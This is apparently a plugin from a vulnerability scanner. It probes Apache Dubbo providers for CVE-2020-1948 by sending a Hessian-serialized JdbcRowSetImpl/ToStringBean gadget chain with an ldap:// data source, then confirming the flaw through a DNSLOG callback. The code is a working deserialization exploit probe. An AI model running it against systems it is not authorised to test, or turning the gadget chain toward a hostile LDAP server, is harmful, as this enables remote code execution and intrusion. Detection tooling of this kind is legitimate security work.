#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Ascotbe'
from ClassCongregation import VulnerabilityDetails,UrlProcessing,ErrorLog,WriteFile,ErrorHandling,Proxies,Dnslog,Exploit,ExploitOutput
import urllib3
import time
from dubbo.codec.hessian2 import new_object
from dubbo.client import DubboClient
# Silences urllib3's InsecureRequestWarning for the whole interpreter process,
# not just this plugin. Nothing in the visible code issues a urllib3 request,
# so the practical effect is on other modules loaded in the same process.
# NOTE(review): with the warning suppressed, unverified HTTPS requests made
# elsewhere will no longer be reported - confirm that is intended.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class VulnerabilityInfo(object):
    """Metadata record describing the CVE-2020-1948 plugin and one scan result.

    The record is exposed as the plain dict ``self.info``. Every value except
    ``details`` is a fixed string; ``details`` holds whatever the caller passes
    in as ``Medusa`` (the result text, or an empty string when only the plugin
    name is needed).
    """

    def __init__(self,Medusa):
        self.info = {
            # CVE/CNVD identifier; 0 when neither exists, CVE preferred over CNVD.
            'number': "CVE-2020-1948",
            # Plugin author.
            'author': "Ascotbe",
            # Date the plugin was written.
            'create_date': "2020-7-3",
            # Public disclosure date (falls back to the plugin date if unknown).
            'disclosure': '2020-06-23',
            # Plugin name, also used as the identifier in error logs.
            'algroup': "DubboProviderDefaultAntiSequenceVulnerability",
            # Human-readable vulnerability name.
            'name': 'DubboProvider默认反序列漏洞',
            # Affected component.
            'affects': "Dubbo",
            # Vulnerability description shown in reports.
            'desc_content': "ApacheDubboProvider存在反序列化漏洞，攻击者可以通过RPC请求发送无法识别的服务名称或方法名称以及一些恶意参数有效载荷，当恶意参数被反序列化时，可以造成远程代码执行。",
            # Severity rating.
            'rank': "高危",
            # Affected versions, CRLF-separated for display.
            'version': "Dubbo2.7.0-2.7.6\r\nDubbo2.6.0-2.6.7\r\nDubbo2.5.x(官方不再维护)",
            # Remediation advice shown in reports (upgrade Dubbo).
            'suggest': "升级最新Dubbo版本",
            # Scan result text supplied by the caller.
            'details': Medusa,
        }



def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check one target for CVE-2020-1948 via an out-of-band DNSLOG callback.

    A single Dubbo RPC request is sent whose argument is a nested object with
    an ``ldap://`` data source on a host obtained from ``Dnslog``. After a
    3-second wait, a truthy ``Dnslog.result()`` is treated as confirmation:
    the finding is stored through ``VulnerabilityDetails`` and written to file.

    Args:
        Url: Target URL; ``UrlProcessing`` splits it into scheme, address and
            port.
        Headers: Not used by this function.
        proxies: Not used by this function; the proxy setting is not passed to
            ``DubboClient``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails``.

    Returns:
        None. Nothing is recorded when no callback is observed, so a silent
        run only means no lookup was seen within the wait window; it does not
        show that the target is patched (egress filtering on the target side
        would produce the same outcome).

    Any exception raised inside the ``try`` block is handed to
    ``ErrorHandling`` and ``ErrorLog`` together with the plugin name instead
    of propagating to the caller.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # NOTE(review): with no explicit port the web defaults 80/443 are used.
    # Dubbo providers usually listen on their own port (20880 by default), so
    # targets are presumably expected to carry an explicit port - confirm
    # against how callers build Url.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
        # Any other scheme leaves port as None; int(None) below then raises
        # inside the try block and is logged as a plugin error.
    try:
        dnslog = Dnslog()
        dubbo_client = DubboClient(url, int(port))

        # Innermost object: its data source points at the DNSLOG host, so a
        # lookup recorded there is the out-of-band signal checked further down.
        rowset = new_object(
            'com.sun.rowset.JdbcRowSetImpl',
            dataSource="ldap://"+dnslog.dns_host(),
            strMatchColumns=["foo"]
        )
        rowset_class = new_object(
            'java.lang.Class',
            name="com.sun.rowset.JdbcRowSetImpl",
        )
        probe_argument = new_object(
            'com.rometools.rome.feed.impl.ToStringBean',
            beanClass=rowset_class,
            obj=rowset
        )

        response = dubbo_client.send_request_and_return_response(
            service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
            # Original author's note: $invokeSync, $echo and similar method
            # names behave the same, and 2.7.7 is affected in addition to the
            # versions published for the CVE - so a 2.7.7 target should not be
            # assumed fixed even though VulnerabilityInfo lists 2.7.0-2.7.6.
            method_name='$invoke',
            args=[probe_argument])
        # Give the target time to perform the lookup before polling DNSLOG.
        time.sleep(3)
        if not dnslog.result():
            return
        report = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(
            url,
            dnslog.dns_text(),
            dnslog.dns_host(),
            str(response),
        )
        finding = VulnerabilityInfo(report)
        # Store the finding together with the target address.
        VulnerabilityDetails(finding.info, url,**kwargs).Write()
        # Persist the report to file; the target address is used as file name.
        WriteFile().result(str(url),str(report))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        # Log the failing plugin and target alongside the exception.
        ErrorLog().Write("Plugin Name:"+plugin_name+" || Target Url:"+url,e)
